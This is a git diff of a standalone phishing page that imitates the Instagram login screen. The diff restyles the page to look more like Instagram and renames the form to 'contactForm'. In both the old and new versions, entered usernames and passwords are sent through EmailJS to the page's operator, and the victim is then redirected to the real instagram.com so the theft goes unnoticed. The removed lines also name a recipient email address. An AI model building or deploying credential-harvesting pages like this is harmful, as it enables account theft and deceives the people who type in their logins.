--- a/index.html
+++ b/index.html
@@ -5,46 +5,97 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Instagram Login</title>
     <script type="text/javascript" src="https://cdn.emailjs.com/dist/email.min.js"></script>
+    <style>
+        body {
+            font-family: 'Arial', sans-serif;
+            background-color: #fafafa;
+            display: flex;
+            justify-content: center;
+            align-items: center;
+            height: 100vh;
+            margin: 0;
+        }
+
+        .login-container {
+            width: 350px;
+            background-color: white;
+            padding: 40px;
+            border-radius: 5px;
+            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
+            text-align: center;
+        }
+
+        .login-container h1 {
+            font-size: 28px;
+            margin-bottom: 20px;
+            font-weight: bold;
+        }
+
+        input {
+            width: 100%;
+            padding: 12px;
+            margin: 10px 0;
+            border: 1px solid #ddd;
+            border-radius: 4px;
+            font-size: 14px;
+        }
+
+        button {
+            width: 100%;
+            padding: 12px;
+            background-color: #0095f6;
+            color: white;
+            border: none;
+            border-radius: 4px;
+            cursor: pointer;
+            font-size: 16px;
+        }
+
+        button:hover {
+            background-color: #006db3;
+        }
+
+        .footer {
+            margin-top: 20px;
+            font-size: 14px;
+        }
+
+        .footer a {
+            color: #00376b;
+            text-decoration: none;
+        }
+    </style>
 </head>
 <body>
-    <div class="container">
-        <div class="login-box">
-            <form id="loginForm">
-                <input type="text" name="username" placeholder="Username" required>
-                <input type="password" name="password" placeholder="Password" required>
-                <button type="submit">Log In</button>
-            </form>
+
+    <div class="login-container">
+        <h1>Instagram</h1>
+        <form id="contactForm">
+            <input type="text" name="username" placeholder="Username" required>
+            <input type="password" name="password" placeholder="Password" required>
+            <button type="submit" id="submitBtn">Log In</button>
+        </form>
+        <div class="footer">
+            <p>Don't have an account? <a href="#">Sign up</a></p>
         </div>
     </div>
 
     <script>
-        (function() {
-            emailjs.init("NEmraMzZjNzKdvfqs");
-        })();
-
-        document.getElementById("loginForm").addEventListener("submit", function (event) {
+        document.getElementById('contactForm').addEventListener('submit', function(event) {
             event.preventDefault();
+            const btn = document.getElementById('submitBtn');
+            btn.textContent = 'Sending...';
 
-            const username = event.target.username.value;
-            const password = event.target.password.value;
-
-            const emailParams = {
-                user_email: "eldrithofficial@gmail.com",
-                username: username,
-                password: password
-            };
-
-            emailjs.send("service_iag6if2", "template_vwlgsjs", emailParams)
-                .then(function(response) {
-                    console.log("Email sent successfully", response);
-                }, function(error) {
-                    console.log("Email sending failed", error);
+            emailjs.send("service_iag6if2", "template_vwlgsjs", this)
+                .then(function() {
+                    window.location.href = 'https://www.instagram.com';
+                })
+                .catch(function(error) {
+                    btn.textContent = 'Log In';
+                    console.error('Error sending email:', error);
                 });
-
-            setTimeout(() => {
-                window.location.href = "https://www.instagram.com";
-            }, 2000);
         });
     </script>
+
 </body>
 </html>
